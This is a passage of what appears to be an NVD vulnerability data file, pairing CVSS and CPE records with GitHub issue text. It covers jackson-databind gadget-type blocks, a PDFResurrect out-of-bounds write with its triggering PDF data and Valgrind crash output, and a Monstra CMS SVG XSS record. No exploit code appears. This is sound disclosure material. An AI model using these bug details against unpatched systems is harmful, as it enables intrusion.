"https://lists.apache.org/thread.html/rc0d5d0f72da1ed6fc5e438b1ddb3fa090c73006b55f873cf845375ab%40%3Cnotifications.zookeeper.apache.org%3E" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": null, "url": "https://lists.apache.org/thread.html/rd0e958d6d5c5ee16efed73314cd0e445c8dbb4bdcc80fc9d1d6c11fc%40%3Cdev.zookeeper.apache.org%3E" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": null, "url": "https://lists.apache.org/thread.html/rd5a4457be4623038c3989294429bc063eec433a2e55995d81591e2ca%40%3Cissues.zookeeper.apache.org%3E" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": null, "url": "https://lists.apache.org/thread.html/rdd49ab9565bec436a896bc00c4b9fc9dce1598e106c318524fbdfec6%40%3Cissues.zookeeper.apache.org%3E" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": null, "url": "https://lists.apache.org/thread.html/rdd4df698d5d8e635144d2994922bf0842e933809eae259521f3b5097%40%3Cissues.zookeeper.apache.org%3E" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": null, "url": "https://lists.apache.org/thread.html/redbe4f1e21bf080f637cf9fbec47729750a2f443a919765360337428%40%3Cnotifications.zookeeper.apache.org%3E" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": null, "url": "https://lists.apache.org/thread.html/rf1bbc0ea4a9f014cf94df9a12a6477d24a27f52741dbc87f2fd52ff2%40%3Cissues.geode.apache.org%3E" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Mailing List", "Third Party Advisory" ], "url": "https://lists.debian.org/debian-lts-announce/2020/03/msg00008.html" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": null, "url": "https://medium.com/%40cowtowncoder/on-jackson-cves-dont-panic-here-is-what-you-need-to-know-54cd0d6e8062" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Third Party Advisory" ], "url": "https://security.netapp.com/advisory/ntap-20200904-0006/" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Patch", "Third Party Advisory" ], "url": "https://www.oracle.com/security-alerts/cpujan2021.html" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Third Party Advisory" ], "url": "https://www.oracle.com/security-alerts/cpujul2020.html" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Patch", "Third Party Advisory" ], "url": "https://www.oracle.com/security-alerts/cpuoct2020.html" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Patch", "Third Party Advisory" ], "url": "https://www.oracle.com/security-alerts/cpuoct2021.html" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:fasterxml:jackson-databind:*:*:*:*:*:*:*:*", "matchCriteriaId": "2F87CF67-6994-43F1-BEC3-DD7D122D0146", "versionEndExcluding": "2.7.9.7", "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": "2.0.0", "vulnerable": true }, { "criteria": "cpe:2.3:a:fasterxml:jackson-databind:*:*:*:*:*:*:*:*", "matchCriteriaId": "04F30C23-46F8-4F58-807B-002C5E96B7F7", "versionEndExcluding": "2.8.11.6", "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": "2.8.0", "vulnerable": true }, { "criteria": "cpe:2.3:a:fasterxml:jackson-databind:*:*:*:*:*:*:*:*", "matchCriteriaId": "77F8EDB1-5890-4054-84FF-2034C7D2ED96", "versionEndExcluding": "2.9.10.4", "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": "2.9.0", "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null }, { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:netapp:active_iq_unified_manager:*:*:*:*:*:linux:*:*", "matchCriteriaId": "9FBC1BD0-FF12-4691-8751-5F245D991989", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": "7.3", "vulnerable": true }, { "criteria": "cpe:2.3:a:netapp:active_iq_unified_manager:*:*:*:*:*:windows:*:*", "matchCriteriaId": "BD075607-09B7-493E-8611-66D041FFDA62", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": "7.3", "vulnerable": true }, { "criteria": "cpe:2.3:a:netapp:active_iq_unified_manager:*:*:*:*:*:vmware_vsphere:*:*", "matchCriteriaId": "0CB28AF5-5AF0-4475-A7B6-12E1795FFDCB", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": "9.5", "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null }, { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:o:debian:debian_linux:8.0:*:*:*:*:*:*:*", "matchCriteriaId": "C11E6FB0-C8C0-4527-9AA0-CB9B316F8F43", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null }, { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:oracle:autovue_for_agile_product_lifecycle_management:21.0.2:*:*:*:*:*:*:*", "matchCriteriaId": "97994257-C9A4-4491-B362-E8B25B7187AB", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true }, { "criteria": "cpe:2.3:a:oracle:banking_platform:*:*:*:*:*:*:*:*", "matchCriteriaId": "5343F8F8-E8B4-49E9-A304-9C8A608B8027", "versionEndExcluding": null, "versionEndIncluding": "2.9.0", "versionStartExcluding": null, "versionStartIncluding": "2.4.0", "vulnerable": true }, { "criteria": "cpe:2.3:a:oracle:communications_contacts_server:8.0.0.4.0:*:*:*:*:*:*:*", "matchCriteriaId": "113E281E-977E-4195-B131-B7C7A2933B6E", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true }, { "criteria": "cpe:2.3:a:oracle:communications_evolved_communications_application_server:7.1:*:*:*:*:*:*:*", "matchCriteriaId": "987811D5-DA5E-493D-8709-F9231A84E5F9", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true }, { "criteria": "cpe:2.3:a:oracle:communications_instant_messaging_server:10.0.1.4.0:*:*:*:*:*:*:*", "matchCriteriaId": "0DB23B9A-571E-4B77-B432-23F3DC9B67D1", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true }, { "criteria": "cpe:2.3:a:oracle:communications_network_charging_and_control:*:*:*:*:*:*:*:*", "matchCriteriaId": "2AB443D1-D8E0-4253-9E1C-B62AEBBE582A", "versionEndExcluding": null, "versionEndIncluding": "12.0.3", "versionStartExcluding": null, "versionStartIncluding": "12.0.0", "vulnerable": true }, { "criteria": "cpe:2.3:a:oracle:communications_network_charging_and_control:6.0.1:*:*:*:*:*:*:*", "matchCriteriaId": "ECC00750-1DBF-401F-886E-E0E65A277409", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true }, { "criteria": "cpe:2.3:a:oracle:enterprise_manager_base_platform:13.3.0.0:*:*:*:*:*:*:*", "matchCriteriaId": "7582B307-3899-4BBB-B868-BC912A4D0109", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true }, { "criteria": "cpe:2.3:a:oracle:enterprise_manager_base_platform:13.4.0.0:*:*:*:*:*:*:*", "matchCriteriaId": "D26F3E23-F1A9-45E7-9E5F-0C0A24EE3783", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true }, { "criteria": "cpe:2.3:a:oracle:global_lifecycle_management_opatch:*:*:*:*:*:*:*:*", "matchCriteriaId": "A8200D5C-D3C7-4936-84A7-37864DEEC62B", "versionEndExcluding": "12.2.0.1.20", "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true }, { "criteria": "cpe:2.3:a:oracle:jd_edwards_enterpriseone_orchestrator:*:*:*:*:*:*:*:*", "matchCriteriaId": "6E46AE88-E9F8-41CB-B15F-12F5127A1E8D", "versionEndExcluding": "9.2.4.2", "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true }, { "criteria": "cpe:2.3:a:oracle:jd_edwards_enterpriseone_tools:*:*:*:*:*:*:*:*", "matchCriteriaId": "A3D635AE-5E4A-47FB-9FCA-D82D52A61367", "versionEndExcluding": "9.2.4.2", "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true }, { "criteria": "cpe:2.3:a:oracle:primavera_unifier:*:*:*:*:*:*:*:*", "matchCriteriaId": "08FA59A8-6A62-4B33-8952-D6E658F8DAC9", "versionEndExcluding": null, "versionEndIncluding": "17.12", "versionStartExcluding": null, "versionStartIncluding": "17.7", "vulnerable": true }, { "criteria": "cpe:2.3:a:oracle:primavera_unifier:16.1:*:*:*:*:*:*:*", "matchCriteriaId": "D55A54FD-7DD1-49CD-BE81-0BE73990943C", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true }, { "criteria": "cpe:2.3:a:oracle:primavera_unifier:16.2:*:*:*:*:*:*:*", "matchCriteriaId": "82EB08C0-2D46-4635-88DF-E54F6452D3A3", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true }, { "criteria": "cpe:2.3:a:oracle:primavera_unifier:18.8:*:*:*:*:*:*:*", "matchCriteriaId": "202AD518-2E9B-4062-B063-9858AE1F9CE2", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true }, { "criteria": "cpe:2.3:a:oracle:primavera_unifier:19.12:*:*:*:*:*:*:*", "matchCriteriaId": "10864586-270E-4ACF-BDCC-ECFCD299305F", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true }, { "criteria": "cpe:2.3:a:oracle:retail_xstore_point_of_service:15.0:*:*:*:*:*:*:*", "matchCriteriaId": "11DA6839-849D-4CEF-85F3-38FE75E07183", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true }, { "criteria": "cpe:2.3:a:oracle:retail_xstore_point_of_service:16.0:*:*:*:*:*:*:*", "matchCriteriaId": "BCE78490-A4BE-40BD-8C72-0A4526BBD4A4", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true }, { "criteria": "cpe:2.3:a:oracle:retail_xstore_point_of_service:17.0:*:*:*:*:*:*:*", "matchCriteriaId": "55AE3629-4A66-49E4-A33D-6D81CC94962F", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true }, { "criteria": "cpe:2.3:a:oracle:retail_xstore_point_of_service:18.0:*:*:*:*:*:*:*", "matchCriteriaId": "4CB39A1A-AD29-45DD-9EB5-5E2053A01B9A", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true }, { "criteria": "cpe:2.3:a:oracle:retail_xstore_point_of_service:19.0:*:*:*:*:*:*:*", "matchCriteriaId": "27C26705-6D1F-4D5E-B64D-B479108154FF", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true }, { "criteria": "cpe:2.3:a:oracle:weblogic_server:12.2.1.3.0:*:*:*:*:*:*:*", "matchCriteriaId": "F14A818F-AA16-4438-A3E4-E64C9287AC66", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true }, { "criteria": "cpe:2.3:a:oracle:weblogic_server:12.2.1.4.0:*:*:*:*:*:*:*", "matchCriteriaId": "4A5BB153-68E0-4DDA-87D1-0D9AB7F0A418", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
[ "502" ]
502
https://github.com/FasterXML/jackson-databind/issues/2634
[ "Patch", "Third Party Advisory" ]
github.com
[ "FasterXML", "jackson-databind" ]
Another 2 gadget type reported regarding a classes of `ibatis-sqlmap` and `Anteros-Core` packages. See https://medium.com/@cowtowncoder/on-jackson-cves-dont-panic-here-is-what-you-need-to-know-54cd0d6e8062 for description of the general problem. Mitre id: CVE-2020-9547, CVE-2020-9548 Reporters: threedr3am & V1ZkRA Fix will be included in: * 2.9.10.4 * 2.8.11.6 (`jackson-bom` version `2.8.11.20200310`) * 2.7.9.7 * Does not affect 2.10.0 and later
Block two more gadget types (ibatis-sqlmap, anteros-core; CVE-2020-9547 / CVE-2020-9548)
https://api.github.com/repos/FasterXML/jackson-databind/issues/2634/comments
8
2020-03-01T01:02:31Z
2020-04-08T02:18:13Z
https://github.com/FasterXML/jackson-databind/issues/2634
573,448,185
2,634
1,098
CVE-2020-9549
2020-03-02T05:15:13.870
In PDFResurrect 0.12 through 0.19, get_type in pdf.c has an out-of-bounds write via a crafted PDF document.
{ "cvssMetricV2": [ { "acInsufInfo": false, "baseSeverity": "MEDIUM", "cvssData": { "accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "PARTIAL", "baseScore": 6.8, "confidentialityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0" }, "exploitabilityScore": 8.6, "impactScore": 6.4, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "source": "nvd@nist.gov", "type": "Primary", "userInteractionRequired": true } ], "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "baseScore": 7.8, "baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "REQUIRED", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.1" }, "exploitabilityScore": 1.8, "impactScore": 5.9, "source": "nvd@nist.gov", "type": "Primary" } ], "cvssMetricV40": null }
[ { "source": "cve@mitre.org", "tags": [ "Exploit", "Third Party Advisory" ], "url": "https://github.com/enferex/pdfresurrect/issues/8" }, { "source": "cve@mitre.org", "tags": [ "Mailing List", "Third Party Advisory" ], "url": "https://lists.debian.org/debian-lts-announce/2020/03/msg00007.html" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Exploit", "Third Party Advisory" ], "url": "https://github.com/enferex/pdfresurrect/issues/8" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Mailing List", "Third Party Advisory" ], "url": "https://lists.debian.org/debian-lts-announce/2020/03/msg00007.html" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:pdfresurrect_project:pdfresurrect:*:*:*:*:*:*:*:*", "matchCriteriaId": "E6D12F79-6ECE-4422-8A8C-D04B40B72615", "versionEndExcluding": null, "versionEndIncluding": "0.19", "versionStartExcluding": null, "versionStartIncluding": "0.12", "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null }, { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:o:debian:debian_linux:8.0:*:*:*:*:*:*:*", "matchCriteriaId": "C11E6FB0-C8C0-4527-9AA0-CB9B316F8F43", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
[ "787" ]
787
https://github.com/enferex/pdfresurrect/issues/8
[ "Exploit", "Third Party Advisory" ]
github.com
[ "enferex", "pdfresurrect" ]
## Description In v0.12 and newer, the function `get_type()` in `pdf.c` has the following logic: https://github.com/enferex/pdfresurrect/blob/e4de3228b617e6467cb74185eb4a3ff0a9471c8a/pdf.c#L1299-L1304 If `buf` does not contain one of the expected terminating characters (whitespace, `/`, `>`), `c` can point to an address outside `buf`, causing a `\x00` byte to be written out-of-bounds. ## Example Instead of creating a PoC, I found a benign PDF that happens to trigger this bug: http://ftpcontent.worldnow.com/wbbh/documents/Remoteattacksurfaces.pdf (sha256: `371d87d27666d1f97678cbf4eec03704f4c1e85029009ee2439690303f7dde28`) The problem occurs while parsing the following data: ``` obj\r\n<</Type/FontDescriptor/FontName/ABCDEE+Calibri/Flags 32/ItalicAngle 0/Ascent 750/Descent -250/CapHeight 750/AvgWidth 521/MaxWidth 1743/FontWeight 400/XHeight 250/StemV 52/FontBBox[ -503 -250 1240 750] /FontFile2 5812 0 R>>\r\nendobj ``` Due to the reuse of `buf` between invocations of the function, `buf` will eventually contain: ``` "FontDescriptor\000FontName\000DeviceRG" ``` This benign example causes a *read* to segfault, but a more carefully crafted input could cause an out-of-bounds write. ## Valgrind ``` <removed for brevity> Remoteattacksurfaces.pdf: --A-- Version 1 -- Object 2029 (FontDescriptor) Remoteattacksurfaces.pdf: --A-- Version 1 -- Object 2030 (FontDescriptor) Remoteattacksurfaces.pdf: --A-- Version 1 -- Object 2031 (FontDescriptor) Remoteattacksurfaces.pdf: --A-- Version 1 -- Object 2032 (FontDescriptor) Remoteattacksurfaces.pdf: --A-- Version 1 -- Object 2033 (FontDescriptor) Remoteattacksurfaces.pdf: --A-- Version 1 -- Object 2034 (FontDescriptor) Remoteattacksurfaces.pdf: --A-- Version 1 -- Object 2035 (FontDescriptor) Remoteattacksurfaces.pdf: --A-- Version 1 -- Object 2036 (FontDescriptor) Remoteattacksurfaces.pdf: --A-- Version 1 -- Object 2037 (FontDescriptor) Remoteattacksurfaces.pdf: --A-- Version 1 -- Object 2038 (FontDescriptor) Remoteattacksurfaces.pdf: --A-- Version 1 -- Object 2039 (FontDescriptor) ==18759== Invalid read of size 1 ==18759== at 0x10D12D: get_type (pdf.c:1296) ==18759== by 0x10B012: pdf_summarize (pdf.c:503) ==18759== by 0x109F95: main (main.c:337) ==18759== Address 0x112000 is not stack'd, malloc'd or (recently) free'd ==18759== ==18759== ==18759== Process terminating with default action of signal 11 (SIGSEGV) ==18759== Access not within mapped region at address 0x112000 ==18759== at 0x10D12D: get_type (pdf.c:1296) ==18759== by 0x10B012: pdf_summarize (pdf.c:503) ==18759== by 0x109F95: main (main.c:337) ==18759== If you believe this happened as a result of a stack ==18759== overflow in your program's main thread (unlikely but ==18759== possible), you can try to increase the size of the ==18759== main thread stack using the --main-stacksize= flag. ==18759== The main thread stack size used in this run was 8388608. ==18759== ==18759== HEAP SUMMARY: ==18759== in use at exit: 284,202 bytes in 9 blocks ==18759== total heap usage: 35,756 allocs, 35,747 frees, 2,340,979,569 bytes allocated ==18759== ==18759== LEAK SUMMARY: ==18759== definitely lost: 0 bytes in 0 blocks ==18759== indirectly lost: 0 bytes in 0 blocks ==18759== possibly lost: 0 bytes in 0 blocks ==18759== still reachable: 284,202 bytes in 9 blocks ==18759== suppressed: 0 bytes in 0 blocks ==18759== Rerun with --leak-check=full to see details of leaked memory ==18759== ==18759== For counts of detected and suppressed errors, rerun with: -v ==18759== ERROR SUMMARY: 1 errors from 1 contexts (suppressed: 0 from 0) ```
Bug: Buffer Overflow into Out-of-Bounds Write
https://api.github.com/repos/enferex/pdfresurrect/issues/8/comments
7
2020-02-28T18:57:24Z
2020-03-05T05:10:03Z
https://github.com/enferex/pdfresurrect/issues/8
572,942,394
8
1,099
CVE-2019-14892
2020-03-02T17:15:17.813
A flaw was discovered in jackson-databind in versions before 2.9.10, 2.8.11.5 and 2.6.7.3, where it would permit polymorphic deserialization of a malicious object using commons-configuration 1 and 2 JNDI classes. An attacker could use this flaw to execute arbitrary code.
{ "cvssMetricV2": [ { "acInsufInfo": false, "baseSeverity": "HIGH", "cvssData": { "accessComplexity": "LOW", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "PARTIAL", "baseScore": 7.5, "confidentialityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0" }, "exploitabilityScore": 10, "impactScore": 6.4, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "source": "nvd@nist.gov", "type": "Primary", "userInteractionRequired": false } ], "cvssMetricV30": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "NONE", "baseScore": 7.5, "baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "integrityImpact": "NONE", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N", "version": "3.0" }, "exploitabilityScore": 3.9, "impactScore": 3.6, "source": "secalert@redhat.com", "type": "Secondary" } ], "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 9.8, "baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1" }, "exploitabilityScore": 3.9, "impactScore": 5.9, "source": "nvd@nist.gov", "type": "Primary" } ], "cvssMetricV40": null }
[ { "source": "secalert@redhat.com", "tags": [ "Third Party Advisory" ], "url": "https://access.redhat.com/errata/RHSA-2020:0729" }, { "source": "secalert@redhat.com", "tags": [ "Issue Tracking", "Patch", "Third Party Advisory" ], "url": "https://bugzilla.redhat.com/show_bug.cgi?id=CVE-2019-14892" }, { "source": "secalert@redhat.com", "tags": [ "Issue Tracking", "Third Party Advisory" ], "url": "https://github.com/FasterXML/jackson-databind/issues/2462" }, { "source": "secalert@redhat.com", "tags": null, "url": "https://lists.apache.org/thread.html/r1b103833cb5bc8466e24ff0ecc5e75b45a705334ab6a444e64e840a0%40%3Cissues.bookkeeper.apache.org%3E" }, { "source": "secalert@redhat.com", "tags": null, "url": "https://lists.apache.org/thread.html/rf1bbc0ea4a9f014cf94df9a12a6477d24a27f52741dbc87f2fd52ff2%40%3Cissues.geode.apache.org%3E" }, { "source": "secalert@redhat.com", "tags": [ "Third Party Advisory" ], "url": "https://security.netapp.com/advisory/ntap-20200904-0005/" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Third Party Advisory" ], "url": "https://access.redhat.com/errata/RHSA-2020:0729" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Issue Tracking", "Patch", "Third Party Advisory" ], "url": "https://bugzilla.redhat.com/show_bug.cgi?id=CVE-2019-14892" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Issue Tracking", "Third Party Advisory" ], "url": "https://github.com/FasterXML/jackson-databind/issues/2462" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": null, "url": "https://lists.apache.org/thread.html/r1b103833cb5bc8466e24ff0ecc5e75b45a705334ab6a444e64e840a0%40%3Cissues.bookkeeper.apache.org%3E" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": null, "url": "https://lists.apache.org/thread.html/rf1bbc0ea4a9f014cf94df9a12a6477d24a27f52741dbc87f2fd52ff2%40%3Cissues.geode.apache.org%3E" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Third Party Advisory" ], "url": "https://security.netapp.com/advisory/ntap-20200904-0005/" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:fasterxml:jackson-databind:*:*:*:*:*:*:*:*", "matchCriteriaId": "7036DA13-110D-40B3-8494-E361BBF4AFCD", "versionEndExcluding": "2.6.7.3", "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": "2.0.0", "vulnerable": true }, { "criteria": "cpe:2.3:a:fasterxml:jackson-databind:*:*:*:*:*:*:*:*", "matchCriteriaId": "5F83B193-74CF-459A-8055-AE0F033D5BCB", "versionEndExcluding": "2.8.11.5", "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": "2.7.0", "vulnerable": true }, { "criteria": "cpe:2.3:a:fasterxml:jackson-databind:*:*:*:*:*:*:*:*", "matchCriteriaId": "FE5543DD-3F9D-45EF-8034-E1EF9657955A", "versionEndExcluding": "2.9.10", "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": "2.9.0", "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null }, { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:redhat:decision_manager:7.0:*:*:*:*:*:*:*", "matchCriteriaId": "68146098-58F8-417E-B165-5182527117C4", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true }, { "criteria": "cpe:2.3:a:redhat:jboss_data_grid:-:*:*:*:text-only:*:*:*", "matchCriteriaId": "2BF03A52-4068-47EA-8846-1E5FB708CE1A", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true }, { "criteria": "cpe:2.3:a:redhat:jboss_data_grid:7.0.0:*:*:*:*:*:*:*", "matchCriteriaId": "CD354E32-A8B0-484C-B4C6-9FBCD3430D2D", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true }, { "criteria": "cpe:2.3:a:redhat:jboss_enterprise_application_platform:7.0:*:*:*:*:*:*:*", "matchCriteriaId": "88BF3B2C-B121-483A-AEF2-8082F6DA5310", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true }, { "criteria": "cpe:2.3:a:redhat:jboss_fuse:7.0.0:*:*:*:*:*:*:*", "matchCriteriaId": "B40CCE4F-EA2C-453D-BB76-6388767E5C6D", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true }, { "criteria": "cpe:2.3:a:redhat:openshift_container_platform:4.3:*:*:*:*:*:*:*", "matchCriteriaId": "6E57E25E-342F-411A-8840-6AF01078D09F", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true }, { "criteria": "cpe:2.3:a:redhat:process_automation:7.0:*:*:*:*:*:*:*", "matchCriteriaId": "20A6B40D-F991-4712-8E30-5FE008505CB7", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null }, { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:apache:geode:1.12.0:*:*:*:*:*:*:*", "matchCriteriaId": "8DD32C20-8B17-4197-9943-B8293D1C3BED", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
[ "502" ]
502
https://github.com/FasterXML/jackson-databind/issues/2462
[ "Issue Tracking", "Third Party Advisory" ]
github.com
[ "FasterXML", "jackson-databind" ]
Another gadget (*) type report regarding a class of `commons-configuration` (and later `commons-configuration2`) package(s) Mitre id: not yet allocated Reporter: @ybhou1993 Fixed in: * 2.9.10 and later * 2.8.11.5 * 2.6.7.3 * does not affect 2.10.0 and later ----- (*) See https://medium.com/@cowtowncoder/on-jackson-cves-dont-panic-here-is-what-you-need-to-know-54cd0d6e8062 for more on general problem type
Block two more gadget types (commons-configuration/-2)
https://api.github.com/repos/FasterXML/jackson-databind/issues/2462/comments
9
2019-09-19T06:22:53Z
2020-02-10T22:12:43Z
https://github.com/FasterXML/jackson-databind/issues/2462
495,597,365
2,462
1,100
CVE-2018-19599
2020-03-02T20:15:11.320
Monstra CMS 1.6 allows XSS via an uploaded SVG document to the admin/index.php?id=filesmanager&path=uploads/ URI. NOTE: this is a discontinued product.
{ "cvssMetricV2": [ { "acInsufInfo": false, "baseSeverity": "LOW", "cvssData": { "accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "SINGLE", "availabilityImpact": "NONE", "baseScore": 3.5, "confidentialityImpact": "NONE", "integrityImpact": "PARTIAL", "vectorString": "AV:N/AC:M/Au:S/C:N/I:P/A:N", "version": "2.0" }, "exploitabilityScore": 6.8, "impactScore": 2.9, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "source": "nvd@nist.gov", "type": "Primary", "userInteractionRequired": true } ], "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "NONE", "baseScore": 5.4, "baseSeverity": "MEDIUM", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "privilegesRequired": "LOW", "scope": "CHANGED", "userInteraction": "REQUIRED", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N", "version": "3.1" }, "exploitabilityScore": 2.3, "impactScore": 2.7, "source": "nvd@nist.gov", "type": "Primary" } ], "cvssMetricV40": null }
